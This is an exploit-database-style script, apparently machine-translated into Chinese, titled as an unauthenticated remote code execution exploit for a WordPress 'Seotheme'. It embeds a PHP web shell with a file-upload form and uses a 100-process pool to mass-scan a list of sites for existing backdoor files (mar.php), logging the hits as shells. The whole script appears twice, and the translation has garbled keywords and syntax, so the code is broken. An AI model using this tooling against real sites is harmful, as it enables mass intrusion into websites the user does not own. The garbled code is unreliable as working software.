#利用标题: WordPress Seotheme-远程代码执行未经验证
#日期: 2023-09-20
#作者: Milad Karimi(Ex3ptional)
#类别: WebApps
#测试在: Windows 10,Firefox
导入系统,请求,重新
从多处理。
从Colorama进口
来自Colorama Import Init
init(autoret=true)
fr=fore.red
fc=fore.cyan
fw=fore.white
fg=fore.green
fm=fore.magenta
shell='''?php echo'ex'; echo'br'.php_uname()。'br'; echo'form method='post'enctype='multipart/form-data'input type='file'name='zb'input type='smist'name='upload='upload'value='upload'/form'; if($ _ post ['upload']){if(@copy($ _ files ['zb'] ['tmp_name'],$ _files ['zb'] ['name'])){echo'echo'explo offlo offloing doad done'; } else {echo'无法上传。'; }}}?'''
requests.urllib3.disable_warnings()
标题={'Connection':'keep-alive',
'cache-control':'max-age=0',
'升级- 不肯定- 重新要求':'1',
'用户代理:'Mozlila/5.0(Linux; Android 7.0; SM-G892A BULID/NRD90M; WV)AppleWebKit/537.36(KHTML,像Gecko一样,像Gecko)版本/4.0套餐/4.0
'Accept':'text/html,application/xhtml+xml,application/xml; q=0.9,image/webp,image/apng,/; q=0.8',
'接受编码:'gzip,deflate',
'Accept-Language':'En-us,en; q=0.9,fr; q=0.8',
'Referer':'www.google.com'}
TRY:
target=[i.strip()for i在open(sys.argv [1],mode='r')中。readlines()]
除了IndexError:
路径=str(sys.argv [0])。split('\\')
退出('\ n [!]输入' +路径[len(path)-1] +'sites.txt')
DEF URLDOMAIN(站点):
如果site.startswith('http://'):
site=site.replace('http://','')
Elif Site.startswith('https://'):
site=site.replace('https://','')
否则:
经过
模式=re.compile('(。*)/')
而Re.Findall(模式,站点):
sitez=re.findall(模式,网站)
site=sitez [0]
返回站点
DEF四百万(URL):
TRY:
url='http://' + urldomain(url)
check=requests.get(url+'/wp-content/plugins/seoplugins/mar.php',headers=headers,laster_redirects=true,timeout=15)
如果'//0x5a4555533.github.io/marijuana/icon.png'in Check.Content:
打印' - | ' + url +' - {} [} [} [}]'。格式(fg)
打开('seoplugins-shells.txt','a')。写(url +'/wp-content/plugins/seoplugins/mar.php \ n')
其他:
url='https://' + urldomain(url)
check=requests.get(url+'/wp-content/plugins/seoplugins/mar.php',headers=headers=headers=true_redirects=true,verify=false,timeout=15)
如果'//0x5a4555533.github.io/marijuana/icon.png'in Check.Content:
打印' - | ' + url +' - {} [} [} [}]'。格式(fg)
打开('seoplugins-shells.txt','a')。写(url +'/wp-content/plugins/seoplugins/mar.php \ n')
其他:
打印' - | ' + url +' - {} [失败]'。格式(fr)
url='http://' + urldomain(url)
check=requests.get(url+'/wp-content/themes/seotheme/mar.php',headers=headers,laster_redirects=true,timeout=15)
如果'//0x5a4555533.github.io/marijuana/icon.png'in Check.Content:
打印' - | ' + url +' - {} [} [} [}]'。格式(fg)
打开('Seotheme-Shells.txt','a')。写(url +'/wp-content/themes/seotheme/mar.php \ n')
其他:
url='https://' + urldomain(url)
check=requests.get(url+'/wp-content/themes/seotheme/mar.php',headers=headers,laster_redirects=true,verifify=false,timeout=15)
如果'//0x5a4555533.github.io/marijuana/icon.png'in Check.Content:
打印' - | ' + url +' - {} [} [} [}]'。格式(fg)
打开('Seotheme-Shells.txt','a')。写(url +'/wp-content/themes/seotheme/mar.php \ n')
其他:
打印' - | ' + url +' - {} [失败]'。格式(fr)
除:
打印' - | ' + url +' - {} [失败]'。格式(fr)
MP=池(100)
MP.MAP(四百三个,目标)
mp.close()
MP.Join()
打印'\ n [!] {}保存在shells.txt'.format(fc)中
#日期: 2023-09-20
#作者: Milad Karimi(Ex3ptional)
#类别: WebApps
#测试在: Windows 10,Firefox
导入系统,请求,重新
从多处理。
从Colorama进口
来自Colorama Import Init
init(autoret=true)
fr=fore.red
fc=fore.cyan
fw=fore.white
fg=fore.green
fm=fore.magenta
shell='''?php echo'ex'; echo'br'.php_uname()。'br'; echo'form method='post'enctype='multipart/form-data'input type='file'name='zb'input type='smist'name='upload='upload'value='upload'/form'; if($ _ post ['upload']){if(@copy($ _ files ['zb'] ['tmp_name'],$ _files ['zb'] ['name'])){echo'echo'explo offlo offloing doad done'; } else {echo'无法上传。'; }}}?'''
requests.urllib3.disable_warnings()
标题={'Connection':'keep-alive',
'cache-control':'max-age=0',
'升级- 不肯定- 重新要求':'1',
'用户代理:'Mozlila/5.0(Linux; Android 7.0; SM-G892A BULID/NRD90M; WV)AppleWebKit/537.36(KHTML,像Gecko一样,像Gecko)版本/4.0套餐/4.0
'Accept':'text/html,application/xhtml+xml,application/xml; q=0.9,image/webp,image/apng,/; q=0.8',
'接受编码:'gzip,deflate',
'Accept-Language':'En-us,en; q=0.9,fr; q=0.8',
'Referer':'www.google.com'}
TRY:
target=[i.strip()for i在open(sys.argv [1],mode='r')中。readlines()]
除了IndexError:
路径=str(sys.argv [0])。split('\\')
退出('\ n [!]输入' +路径[len(path)-1] +'sites.txt')
DEF URLDOMAIN(站点):
如果site.startswith('http://'):
site=site.replace('http://','')
Elif Site.startswith('https://'):
site=site.replace('https://','')
否则:
经过
模式=re.compile('(。*)/')
而Re.Findall(模式,站点):
sitez=re.findall(模式,网站)
site=sitez [0]
返回站点
DEF四百万(URL):
TRY:
url='http://' + urldomain(url)
check=requests.get(url+'/wp-content/plugins/seoplugins/mar.php',headers=headers,laster_redirects=true,timeout=15)
如果'//0x5a4555533.github.io/marijuana/icon.png'in Check.Content:
打印' - | ' + url +' - {} [} [} [}]'。格式(fg)
打开('seoplugins-shells.txt','a')。写(url +'/wp-content/plugins/seoplugins/mar.php \ n')
其他:
url='https://' + urldomain(url)
check=requests.get(url+'/wp-content/plugins/seoplugins/mar.php',headers=headers=headers=true_redirects=true,verify=false,timeout=15)
如果'//0x5a4555533.github.io/marijuana/icon.png'in Check.Content:
打印' - | ' + url +' - {} [} [} [}]'。格式(fg)
打开('seoplugins-shells.txt','a')。写(url +'/wp-content/plugins/seoplugins/mar.php \ n')
其他:
打印' - | ' + url +' - {} [失败]'。格式(fr)
url='http://' + urldomain(url)
check=requests.get(url+'/wp-content/themes/seotheme/mar.php',headers=headers,laster_redirects=true,timeout=15)
如果'//0x5a4555533.github.io/marijuana/icon.png'in Check.Content:
打印' - | ' + url +' - {} [} [} [}]'。格式(fg)
打开('Seotheme-Shells.txt','a')。写(url +'/wp-content/themes/seotheme/mar.php \ n')
其他:
url='https://' + urldomain(url)
check=requests.get(url+'/wp-content/themes/seotheme/mar.php',headers=headers,laster_redirects=true,verifify=false,timeout=15)
如果'//0x5a4555533.github.io/marijuana/icon.png'in Check.Content:
打印' - | ' + url +' - {} [} [} [}]'。格式(fg)
打开('Seotheme-Shells.txt','a')。写(url +'/wp-content/themes/seotheme/mar.php \ n')
其他:
打印' - | ' + url +' - {} [失败]'。格式(fr)
除:
打印' - | ' + url +' - {} [失败]'。格式(fr)
MP=池(100)
MP.MAP(四百三个,目标)
mp.close()
MP.Join()
打印'\ n [!] {}保存在shells.txt'.format(fc)中
